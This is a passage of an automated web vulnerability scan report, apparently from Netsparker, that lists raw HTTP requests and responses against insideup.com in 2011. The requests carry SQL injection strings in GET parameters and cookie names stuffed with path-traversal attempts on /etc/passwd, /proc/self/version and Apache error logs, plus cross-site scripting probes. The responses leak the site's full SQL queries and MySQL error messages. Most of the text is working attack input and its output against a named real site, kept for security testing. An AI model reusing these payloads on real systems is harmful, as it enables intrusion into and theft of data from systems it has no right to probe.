OAVARS[\'+NSFTW+\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../proc/self/version]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../proc/self/version\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[javascript:netsparker(0x000323)]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[<script>ns(0x000332)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd\0avw.php]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[avw.php]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[body{x:expression(netsparker(0x000352))}]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[avw.php\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Wed, 20 Apr 2011 02:25:16 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: PHPSESSID=iar9h3u8k91u168q9242du67l4; path=/
Content-Length: 4143
Connection: close
Content-Type: text/html; charset=UTF-8


select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/bulo00/project.php?catId='+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'&iusrc=iupsc' OR prj.project_page_url = 'leadflow/bulo00/project.php?catId='+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'&iusrc=iupsc/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_two_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/bulo00/project.php?catId='+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'&iusrc=iupsc' OR prj.project_page_url = 'leadflow/bulo00/project.php?catId='+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'&iusrc=iupsc/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_dynamic_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/bulo00/project.php?catId='+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'&iusrc=iupsc' OR prj.project_page_url = 'leadflow/bulo00/project.php?catId='+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'&iusrc=iupsc/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_video_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/bulo00/project.php?catId='+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'&iusrc=iupsc' OR prj.project_page_url = 'leadflow/bulo00/project.php?catId='+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'&iusrc=iupsc/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_mobile_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/bulo00/project.php?catId='+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'&iusrc=iupsc' OR prj.project_page_url = 'leadflow/bulo00/project.php?catId='+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'&iusrc=iupsc/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+' at line 5
- /ppc/leadflow/lgds00/project.php

/ppc/leadflow/lgds00/project.php

http://www.insideup.com/ppc/leadflow/lgds00/project.php?catId=80005&iusrc='%2B%20(select+convert(int..

Parameters

Parameter Type Value
catId GET 80005
iusrc GET '+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'

Request

GET /ppc/leadflow/lgds00/project.php?catId=80005&iusrc='%2B%20(select+convert(int,CHAR(95)%2BCHAR(33)%2BCHAR(64)%2BCHAR(50)%2BCHAR(100)%2BCHAR(105)%2BCHAR(108)%2BCHAR(101)%2BCHAR(109)%2BCHAR(109)%2BCHAR(97))+FROM+syscolumns)%20%2B' HTTP/1.1
Referer: http://www.insideup.com/selectvendors.html
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.insideup.com
Cookie: OAVARS[a08b960a\0\'\"--></style></script><script>netsparker(0x0002ED)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../etc/httpd/logs/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../etc/httpd/logs/error_log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../var/log/apache2/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[NSFTW]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[//netsparker.com/n/n.css?0x000308]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../var/log/apache/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[\'+NSFTW+\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../proc/self/version]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../proc/self/version\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[javascript:netsparker(0x000323)]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[<script>ns(0x000332)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd\0avw.php]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[avw.php]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[body{x:expression(netsparker(0x000352))}]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[avw.php\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Wed, 20 Apr 2011 02:25:39 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: PHPSESSID=pbbvsla13h2ld0e3sr9aj1u6d5; path=/
Content-Length: 4143
Connection: close
Content-Type: text/html; charset=UTF-8


select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/lgds00/project.php?catId=80005&iusrc='+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'' OR prj.project_page_url = 'leadflow/lgds00/project.php?catId=80005&iusrc='+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_two_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/lgds00/project.php?catId=80005&iusrc='+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'' OR prj.project_page_url = 'leadflow/lgds00/project.php?catId=80005&iusrc='+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_dynamic_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/lgds00/project.php?catId=80005&iusrc='+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'' OR prj.project_page_url = 'leadflow/lgds00/project.php?catId=80005&iusrc='+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_video_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/lgds00/project.php?catId=80005&iusrc='+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'' OR prj.project_page_url = 'leadflow/lgds00/project.php?catId=80005&iusrc='+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_mobile_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/lgds00/project.php?catId=80005&iusrc='+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'' OR prj.project_page_url = 'leadflow/lgds00/project.php?catId=80005&iusrc='+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+' at line 5
- /ppc/leadflow/obtm00/project.php

/ppc/leadflow/obtm00/project.php

http://www.insideup.com/ppc/leadflow/obtm00/project.php?catId='%2B%20(select+convert(int,CHAR(95)%2B..

Parameters

Parameter Type Value
catId GET '+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'
iusrc GET iupsc

Request

GET /ppc/leadflow/obtm00/project.php?catId='%2B%20(select+convert(int,CHAR(95)%2BCHAR(33)%2BCHAR(64)%2BCHAR(50)%2BCHAR(100)%2BCHAR(105)%2BCHAR(108)%2BCHAR(101)%2BCHAR(109)%2BCHAR(109)%2BCHAR(97))+FROM+syscolumns)%20%2B'&iusrc=iupsc HTTP/1.1
Referer: http://www.insideup.com/selectvendors.html
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.insideup.com
Cookie: OAVARS[a08b960a\0\'\"--></style></script><script>netsparker(0x0002ED)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../etc/httpd/logs/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../etc/httpd/logs/error_log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../var/log/apache2/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[NSFTW]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[//netsparker.com/n/n.css?0x000308]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../var/log/apache/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[\'+NSFTW+\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../proc/self/version]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../proc/self/version\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[javascript:netsparker(0x000323)]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[<script>ns(0x000332)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd\0avw.php]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[avw.php]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[body{x:expression(netsparker(0x000352))}]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[avw.php\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Wed, 20 Apr 2011 02:26:03 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
